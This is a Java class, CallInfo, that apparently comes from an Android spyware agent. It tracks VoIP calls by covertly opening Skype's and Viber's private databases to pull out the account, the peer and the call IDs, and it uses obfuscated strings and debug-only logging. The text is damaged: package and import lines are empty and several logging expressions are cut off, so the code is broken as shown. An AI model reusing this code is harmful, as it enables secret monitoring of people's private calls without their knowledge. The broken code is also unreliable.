package; import; import; import; import; import; import; import java.util.Date; public class CallInfo { private static final String TAG = "CallInfo"; public int id; public String account; public String peer; public String displayName; public boolean incoming; public boolean valid; public String processName; public int programId; public Date timestamp; public boolean delay; public boolean realRate; private long[] streamId = new long[2]; public Date begin; public Date end; public String getCaller() { if (!incoming) { return account; } return peer; } public String getCallee() { if (incoming) { return account; } return peer; } public long getStreamId(boolean remote) { int pos = remote ? 1 : 0; return this.streamId[pos]; } public boolean setStreamId(boolean remote, long streamId) { int pos = remote ? 1 : 0; if (streamId != this.streamId[pos]) { if (this.streamId[pos] != 0) { if (Cfg.DEBUG) { Check.log(TAG + " (setStreamId): Wrong streamId: " + this.streamId[pos] + " <- " + streamId + " " + (remote ? "remote" : "local")); } this.streamId[pos] = streamId; return false; } this.streamId[pos] = streamId; } return true; } public boolean setStreamPid(int pid) { if (pid != this.programId) { if (this.programId != 0) { if (Cfg.DEBUG) { Check.log(TAG + " (setStreamPid): Wrong pid: " + this.programId + " <- " + pid); } this.programId = pid; return false; } this.programId = pid; } return true; } public boolean update(boolean end) { // RunningAppProcessInfo fore = runningProcesses.getForeground_wrapper(); if (this.valid) { return true; } if (Cfg.DEBUG) { Check.asserts(this.programId!=0, "ProgramId should never be zero"); Check.log(TAG + " (update), programId: " + this.programId); } if (!this.incoming && this.programId == 0 && end) { // HACK: fix this thing. // the last local viber chunk has pid 0, we fix it here this.programId = 0x0148; } if (this.programId == 0x0146) { if (end) { return true; } this.processName = M.e(""); // open DB String account = ChatSkype.readAccount(); this.account = account; this.delay = false; this.realRate = false; if(account == null){ if (Cfg.DEBUG) { Check.log(TAG + " (update) ERROR, cannot read Skype account "); return false; } } boolean ret = false; GenericSqliteHelper helper = ChatSkype.openSkypeDBHelper(account); if (helper != null) { ret = ChatSkype.getCurrentCall(helper, this); if (Cfg.DEBUG) { Check.log(TAG + " SKYPE (updateCallInfo): id: " + + " peer: " + this.peer + "returning:" + ret); } helper.disposeDb(); } return ret; } else if (this.programId == 0x0148) { boolean ret = false; this.processName = M.e("com.viber.voip"); this.delay = true; this.realRate = true; // open DB if (end) { String account = ChatViber.readAccount(); this.account = account; GenericSqliteHelper helper = ChatViber.openViberDBHelperCall(); if (helper != null) { ret = ChatViber.getCurrentCall(helper, this); helper.disposeDb(); } if (Cfg.DEBUG) { Check.log(TAG + " (updateCallInfo) id: " +; } } else { this.account = M.e("delay"); this.peer = M.e("delay"); ret = true; } if (Cfg.DEBUG) { Check.log(TAG + " VIBER (updateCallInfo): id: " + + " peer: " + this.peer + "returning:" + ret); } return ret; } return false; } }